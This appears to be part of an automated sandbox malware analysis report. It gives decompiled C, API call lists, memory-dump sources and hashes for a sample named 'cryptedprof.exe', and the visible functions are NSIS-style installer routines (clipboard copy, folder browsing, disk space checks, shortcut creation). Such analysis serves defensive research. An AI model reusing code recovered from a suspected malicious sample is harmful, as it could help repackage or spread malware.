                                                                                        				int _t95;
                                                                                        				int _t96;
                                                                                        				long _t99;
                                                                                        				void* _t102;
                                                                                        				intOrPtr _t124;
                                                                                        				struct HWND__* _t128;
                                                                                        				int _t150;
                                                                                        				int _t153;
                                                                                        				long _t157;
                                                                                        				struct HWND__* _t161;
                                                                                        				struct HMENU__* _t163;
                                                                                        				long _t165;
                                                                                        				void* _t166;
                                                                                        				char* _t167;
                                                                                        				char* _t168;
                                                                                        				int _t169;
                                                                                        
                                                                                        				_t87 =  *0x42ec24; // 0x0
                                                                                        				_t157 = _a8;
                                                                                        				_t150 = 0;
                                                                                        				_v8 = _t87;
                                                                                        				if(_t157 != 0x110) {
                                                                                        					__eflags = _t157 - 0x405;
                                                                                        					if(_t157 == 0x405) {
                                                                                        						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                                                        					}
                                                                                        					__eflags = _t157 - 0x111;
                                                                                        					if(_t157 != 0x111) {
                                                                                        						L17:
                                                                                        						__eflags = _t157 - 0x404;
                                                                                        						if(_t157 != 0x404) {
                                                                                        							L25:
                                                                                        							__eflags = _t157 - 0x7b;
                                                                                        							if(_t157 != 0x7b) {
                                                                                        								goto L20;
                                                                                        							}
                                                                                        							_t89 = _v8;
                                                                                        							__eflags = _a12 - _t89;
                                                                                        							if(_a12 != _t89) {
                                                                                        								goto L20;
                                                                                        							}
                                                                                        							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                                                        							__eflags = _t90 - _t150;
                                                                                        							_a12 = _t90;
                                                                                        							if(_t90 <= _t150) {
                                                                                        								L36:
                                                                                        								return 0;
                                                                                        							}
                                                                                        							_t163 = CreatePopupMenu();
                                                                                        							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                                                        							_t95 = _a16;
                                                                                        							__eflags = _a16 - 0xffffffff;
                                                                                        							_t153 = _a16 >> 0x10;
                                                                                        							if(_a16 == 0xffffffff) {
                                                                                        								GetWindowRect(_v8,  &_v24);
                                                                                        								_t95 = _v24.left;
                                                                                        								_t153 = _v24.top;
                                                                                        							}
                                                                                        							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                                                        							__eflags = _t96 - 1;
                                                                                        							if(_t96 == 1) {
                                                                                        								_t165 = 1;
                                                                                        								__eflags = 1;
                                                                                        								_v56 = _t150;
                                                                                        								_v44 = 0x42a8b8;
                                                                                        								_v40 = 0x1000;
                                                                                        								_a4 = _a12;
                                                                                        								do {
                                                                                        									_a4 = _a4 - 1;
                                                                                        									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                                                        									__eflags = _a4 - _t150;
                                                                                        									_t165 = _t165 + _t99 + 2;
                                                                                        								} while (_a4 != _t150);
                                                                                        								OpenClipboard(_t150);
                                                                                        								EmptyClipboard();
                                                                                        								_t102 = GlobalAlloc(0x42, _t165);
                                                                                        								_a4 = _t102;
                                                                                        								_t166 = GlobalLock(_t102);
                                                                                        								do {
                                                                                        									_v44 = _t166;
                                                                                        									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                                                        									 *_t167 = 0xd;
                                                                                        									_t168 = _t167 + 1;
                                                                                        									 *_t168 = 0xa;
                                                                                        									_t166 = _t168 + 1;
                                                                                        									_t150 = _t150 + 1;
                                                                                        									__eflags = _t150 - _a12;
                                                                                        								} while (_t150 < _a12);
                                                                                        								GlobalUnlock(_a4);
                                                                                        								SetClipboardData(1, _a4);
                                                                                        								CloseClipboard();
                                                                                        							}
                                                                                        							goto L36;
                                                                                        						}
                                                                                        						__eflags =  *0x42ec0c - _t150; // 0x0
                                                                                        						if(__eflags == 0) {
                                                                                        							ShowWindow( *0x42f448, 8);
                                                                                        							__eflags =  *0x42f4ec - _t150;
                                                                                        							if( *0x42f4ec == _t150) {
                                                                                        								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
                                                                                        							}
                                                                                        							E004042AA(1);
                                                                                        							goto L25;
                                                                                        						}
                                                                                        						 *0x429c88 = 2;
                                                                                        						E004042AA(0x78);
                                                                                        						goto L20;
                                                                                        					} else {
                                                                                        						__eflags = _a12 - 0x403;
                                                                                        						if(_a12 != 0x403) {
                                                                                        							L20:
                                                                                        							return E00404338(_t157, _a12, _a16);
                                                                                        						}
                                                                                        						ShowWindow( *0x42ec10, _t150);
                                                                                        						ShowWindow(_v8, 8);
                                                                                        						E00404306(_v8);
                                                                                        						goto L17;
                                                                                        					}
                                                                                        				}
                                                                                        				_v48 = _v48 | 0xffffffff;
                                                                                        				_v36 = _v36 | 0xffffffff;
                                                                                        				_t169 = 2;
                                                                                        				_v56 = _t169;
                                                                                        				_v52 = 0;
                                                                                        				_v44 = 0;
                                                                                        				_v40 = 0;
                                                                                        				asm("stosd");
                                                                                        				asm("stosd");
                                                                                        				_t124 =  *0x42f454;
                                                                                        				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                                                        				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                                                        				 *0x42ec10 = GetDlgItem(_a4, 0x403);
                                                                                        				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
                                                                                        				_t128 = GetDlgItem(_a4, 0x3f8);
                                                                                        				 *0x42ec24 = _t128;
                                                                                        				_v8 = _t128;
                                                                                        				E00404306( *0x42ec10);
                                                                                        				 *0x42ec14 = E00404BF7(4);
                                                                                        				 *0x42ec2c = 0;
                                                                                        				GetClientRect(_v8,  &_v24);
                                                                                        				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                                                        				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                                        				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                        				if(_a12 >= 0) {
                                                                                        					SendMessageA(_v8, 0x1001, 0, _a12);
                                                                                        					SendMessageA(_v8, 0x1026, 0, _a12);
                                                                                        				}
                                                                                        				if(_a8 >= _t150) {
                                                                                        					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                                                        				}
                                                                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                        				_push(0x1b);
                                                                                        				E004042D1(_a4);
                                                                                        				if(( *0x42f45c & 0x00000003) != 0) {
                                                                                        					ShowWindow( *0x42ec10, _t150);
                                                                                        					if(( *0x42f45c & 0x00000002) != 0) {
                                                                                        						 *0x42ec10 = _t150;
                                                                                        					} else {
                                                                                        						ShowWindow(_v8, 8);
                                                                                        					}
                                                                                        					E00404306( *0x42ec08);
                                                                                        				}
                                                                                        				_t161 = GetDlgItem(_a4, 0x3ec);
                                                                                        				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                                                        				if(( *0x42f45c & 0x00000004) != 0) {
                                                                                        					SendMessageA(_t161, 0x409, _t150, _a8);
                                                                                        					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                                                        				}
                                                                                        				goto L36;
                                                                                        			}



































                                                                                        0x00405656
                                                                                        0x00405656
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetDlgItem.USER32 ref: 00405511
                                                                                        • GetDlgItem.USER32 ref: 00405520
                                                                                        • GetClientRect.USER32 ref: 0040555D
                                                                                        • GetSystemMetrics.USER32 ref: 00405564
                                                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405585
                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405596
                                                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055A9
                                                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055B7
                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CA
                                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055EC
                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405600
                                                                                        • GetDlgItem.USER32 ref: 00405621
                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405631
                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564A
                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405656
                                                                                        • GetDlgItem.USER32 ref: 0040552F
                                                                                          • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                                                        • GetDlgItem.USER32 ref: 00405672
                                                                                        • CreateThread.KERNEL32 ref: 00405680
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405687
                                                                                        • ShowWindow.USER32(00000000), ref: 004056AA
                                                                                        • ShowWindow.USER32(?,00000008), ref: 004056B1
                                                                                        • ShowWindow.USER32(00000008), ref: 004056F7
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572B
                                                                                        • CreatePopupMenu.USER32 ref: 0040573C
                                                                                        • AppendMenuA.USER32 ref: 00405751
                                                                                        • GetWindowRect.USER32 ref: 00405771
                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057C6
                                                                                        • OpenClipboard.USER32(00000000), ref: 004057D6
                                                                                        • EmptyClipboard.USER32 ref: 004057DC
                                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
                                                                                        • GlobalLock.KERNEL32 ref: 004057EF
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405803
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040581C
                                                                                        • SetClipboardData.USER32 ref: 00405827
                                                                                        • CloseClipboard.USER32 ref: 0040582D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 590372296-0
                                                                                        • Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                                        • Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
                                                                                        • Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                                        • Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 78%
                                                                                        			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				long _v16;
                                                                                        				long _v20;
                                                                                        				long _v24;
                                                                                        				char _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				long _v36;
                                                                                        				char _v40;
                                                                                        				unsigned int _v44;
                                                                                        				signed int _v48;
                                                                                        				CHAR* _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				intOrPtr _v64;
                                                                                        				intOrPtr _v68;
                                                                                        				CHAR* _v72;
                                                                                        				void _v76;
                                                                                        				struct HWND__* _v80;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				intOrPtr _t82;
                                                                                        				long _t87;
                                                                                        				signed char* _t89;
                                                                                        				void* _t95;
                                                                                        				signed int _t96;
                                                                                        				int _t109;
                                                                                        				signed char _t114;
                                                                                        				signed int _t118;
                                                                                        				struct HWND__** _t122;
                                                                                        				intOrPtr* _t138;
                                                                                        				CHAR* _t146;
                                                                                        				intOrPtr _t147;
                                                                                        				unsigned int _t150;
                                                                                        				signed int _t152;
                                                                                        				unsigned int _t156;
                                                                                        				signed int _t158;
                                                                                        				signed int* _t159;
                                                                                        				signed char* _t160;
                                                                                        				struct HWND__* _t165;
                                                                                        				struct HWND__* _t166;
                                                                                        				int _t168;
                                                                                        				unsigned int _t197;
                                                                                        
                                                                                        				_t156 = __edx;
                                                                                        				_t82 =  *0x42a090;
                                                                                        				_v32 = _t82;
                                                                                        				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                                                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                        				if(_a8 == 0x40b) {
                                                                                        					E0040594D(0x3fb, _t146);
                                                                                        					E00406528(_t146);
                                                                                        				}
                                                                                        				_t166 = _a4;
                                                                                        				if(_a8 != 0x110) {
                                                                                        					L8:
                                                                                        					if(_a8 != 0x111) {
                                                                                        						L20:
                                                                                        						if(_a8 == 0x40f) {
                                                                                        							L22:
                                                                                        							_v8 = _v8 & 0x00000000;
                                                                                        							_v12 = _v12 & 0x00000000;
                                                                                        							E0040594D(0x3fb, _t146);
                                                                                        							if(E00405CD3(_t185, _t146) == 0) {
                                                                                        								_v8 = 1;
                                                                                        							}
                                                                                        							E0040624D(0x429888, _t146);
                                                                                        							_t87 = E00406656(1);
                                                                                        							_v16 = _t87;
                                                                                        							if(_t87 == 0) {
                                                                                        								L30:
                                                                                        								E0040624D(0x429888, _t146);
                                                                                        								_t89 = E00405C7E(0x429888);
                                                                                        								_t158 = 0;
                                                                                        								if(_t89 != 0) {
                                                                                        									 *_t89 =  *_t89 & 0x00000000;
                                                                                        								}
                                                                                        								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                        									goto L35;
                                                                                        								} else {
                                                                                        									_t168 = 0x400;
                                                                                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                        									asm("cdq");
                                                                                        									_v48 = _t109;
                                                                                        									_v44 = _t156;
                                                                                        									_v12 = 1;
                                                                                        									goto L36;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t159 = 0;
                                                                                        								if(0 == 0x429888) {
                                                                                        									goto L30;
                                                                                        								} else {
                                                                                        									goto L26;
                                                                                        								}
                                                                                        								while(1) {
                                                                                        									L26:
                                                                                        									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
                                                                                        									if(_t114 != 0) {
                                                                                        										break;
                                                                                        									}
                                                                                        									if(_t159 != 0) {
                                                                                        										 *_t159 =  *_t159 & _t114;
                                                                                        									}
                                                                                        									_t160 = E00405C2C(0x429888);
                                                                                        									 *_t160 =  *_t160 & 0x00000000;
                                                                                        									_t159 = _t160 - 1;
                                                                                        									 *_t159 = 0x5c;
                                                                                        									if(_t159 != 0x429888) {
                                                                                        										continue;
                                                                                        									} else {
                                                                                        										goto L30;
                                                                                        									}
                                                                                        								}
                                                                                        								_t150 = _v44;
                                                                                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                        								_v44 = _t150 >> 0xa;
                                                                                        								_v12 = 1;
                                                                                        								_t158 = 0;
                                                                                        								__eflags = 0;
                                                                                        								L35:
                                                                                        								_t168 = 0x400;
                                                                                        								L36:
                                                                                        								_t95 = E00404BF7(5);
                                                                                        								if(_v12 != _t158) {
                                                                                        									_t197 = _v44;
                                                                                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                        										_v8 = 2;
                                                                                        									}
                                                                                        								}
                                                                                        								_t147 =  *0x42ec1c; // 0x6301d0
                                                                                        								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                        									E00404BDF(0x3ff, 0xfffffffb, _t95);
                                                                                        									if(_v12 == _t158) {
                                                                                        										SetDlgItemTextA(_a4, _t168, 0x429878);
                                                                                        									} else {
                                                                                        										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
                                                                                        									}
                                                                                        								}
                                                                                        								_t96 = _v8;
                                                                                        								 *0x42f504 = _t96;
                                                                                        								if(_t96 == _t158) {
                                                                                        									_v8 = E0040140B(7);
                                                                                        								}
                                                                                        								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                        									_v8 = _t158;
                                                                                        								}
                                                                                        								E004042F3(0 | _v8 == _t158);
                                                                                        								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
                                                                                        									E004046BC();
                                                                                        								}
                                                                                        								 *0x42a8a8 = _t158;
                                                                                        								goto L53;
                                                                                        							}
                                                                                        						}
                                                                                        						_t185 = _a8 - 0x405;
                                                                                        						if(_a8 != 0x405) {
                                                                                        							goto L53;
                                                                                        						}
                                                                                        						goto L22;
                                                                                        					}
                                                                                        					_t118 = _a12 & 0x0000ffff;
                                                                                        					if(_t118 != 0x3fb) {
                                                                                        						L12:
                                                                                        						if(_t118 == 0x3e9) {
                                                                                        							_t152 = 7;
                                                                                        							memset( &_v76, 0, _t152 << 2);
                                                                                        							_v80 = _t166;
                                                                                        							_v72 = 0x42a8b8;
                                                                                        							_v60 = E00404AB4;
                                                                                        							_v56 = _t146;
                                                                                        							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
                                                                                        							_t122 =  &_v80;
                                                                                        							_v64 = 0x41;
                                                                                        							__imp__SHBrowseForFolderA(_t122);
                                                                                        							if(_t122 == 0) {
                                                                                        								_a8 = 0x40f;
                                                                                        							} else {
                                                                                        								__imp__CoTaskMemFree(_t122);
                                                                                        								E00405BE5(_t146);
                                                                                        								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
                                                                                        								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
                                                                                        									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
                                                                                        									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
                                                                                        										lstrcatA(_t146, 0x42e3e0);
                                                                                        									}
                                                                                        								}
                                                                                        								 *0x42a8a8 =  *0x42a8a8 + 1;
                                                                                        								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                        							}
                                                                                        						}
                                                                                        						goto L20;
                                                                                        					}
                                                                                        					if(_a12 >> 0x10 != 0x300) {
                                                                                        						goto L53;
                                                                                        					}
                                                                                        					_a8 = 0x40f;
                                                                                        					goto L12;
                                                                                        				} else {
                                                                                        					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                        					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
                                                                                        						E00405BE5(_t146);
                                                                                        					}
                                                                                        					 *0x42ec18 = _t166;
                                                                                        					SetWindowTextA(_t165, _t146);
                                                                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                        					_push(1);
                                                                                        					E004042D1(_t166);
                                                                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                        					_push(0x14);
                                                                                        					E004042D1(_t166);
                                                                                        					E00404306(_t165);
                                                                                        					_t138 = E00406656(8);
                                                                                        					if(_t138 == 0) {
                                                                                        						L53:
                                                                                        						return E00404338(_a8, _a12, _a16);
                                                                                        					} else {
                                                                                        						 *_t138(_t165, 1);
                                                                                        						goto L8;
                                                                                        					}
                                                                                        				}
                                                                                        			}

                                                                                        APIs
                                                                                        • GetDlgItem.USER32 ref: 004047B2
                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 004047DC
                                                                                        • SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404898
                                                                                        • lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
                                                                                        • lstrcatA.KERNEL32(?,Call), ref: 004048D6
                                                                                        • SetDlgItemTextA.USER32 ref: 004048E8
                                                                                          • Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960
                                                                                          • Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\cryptedprof.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                                          • Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                          • Part of subcall function 00406528: CharNextA.USER32(?,"C:\Users\user\Desktop\cryptedprof.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                                          • Part of subcall function 00406528: CharPrevA.USER32(?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                                        • GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1
                                                                                          • Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                          • Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
                                                                                          • Part of subcall function 00404B1A: SetDlgItemTextA.USER32 ref: 00404BD3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                        • API String ID: 2624150263-1655598669
                                                                                        • Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                        • Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
                                                                                        • Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                        • Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 74%
                                                                                        			E0040216B(void* __eflags) {
                                                                                        				signed int _t55;
                                                                                        				void* _t59;
                                                                                        				intOrPtr* _t63;
                                                                                        				intOrPtr _t64;
                                                                                        				intOrPtr* _t65;
                                                                                        				intOrPtr* _t67;
                                                                                        				intOrPtr* _t69;
                                                                                        				intOrPtr* _t71;
                                                                                        				intOrPtr* _t73;
                                                                                        				intOrPtr* _t75;
                                                                                        				intOrPtr* _t78;
                                                                                        				intOrPtr* _t80;
                                                                                        				intOrPtr* _t82;
                                                                                        				intOrPtr* _t84;
                                                                                        				int _t87;
                                                                                        				intOrPtr* _t95;
                                                                                        				signed int _t105;
                                                                                        				signed int _t109;
                                                                                        				void* _t111;
                                                                                        
                                                                                        				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                                                        				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                                                        				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                                                        				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                                                        				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                                                        				_t55 =  *(_t111 - 0x18);
                                                                                        				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                                                        				_t105 = _t55 & 0x00008000;
                                                                                        				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                                                        				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                                                        				if(E00405C52( *(_t111 - 0xc)) == 0) {
                                                                                        					E00402BCE(0x21);
                                                                                        				}
                                                                                        				_t59 = _t111 + 8;
                                                                                        				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                                                        				if(_t59 < _t87) {
                                                                                        					L15:
                                                                                        					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                                                        					_push(0xfffffff0);
                                                                                        				} else {
                                                                                        					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                                                        					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                                                        					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                                                        					if(_t64 >= _t87) {
                                                                                        						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                                                        						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                                                        						if(_t105 == _t87) {
                                                                                        							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                                                        							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\engineer\\AppData\\Local\\Temp");
                                                                                        						}
                                                                                        						if(_t109 != _t87) {
                                                                                        							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                                                        							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                                                        						}
                                                                                        						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                                                        						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                                                        						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                                                        						if( *_t95 != _t87) {
                                                                                        							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                                                        							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                                                        						}
                                                                                        						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                                                        						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                                                        						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                                                        						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                                                        						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                        							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                                                        							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                                                        								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                        								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                                                        							}
                                                                                        						}
                                                                                        						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                                                        						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                                                        					}
                                                                                        					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                                                        					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                        					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                                                        						_push(0xfffffff4);
                                                                                        					} else {
                                                                                        						goto L15;
                                                                                        					}
                                                                                        				}
                                                                                        				E00401423();
                                                                                        				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
                                                                                        				return 0;
                                                                                        			}


                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
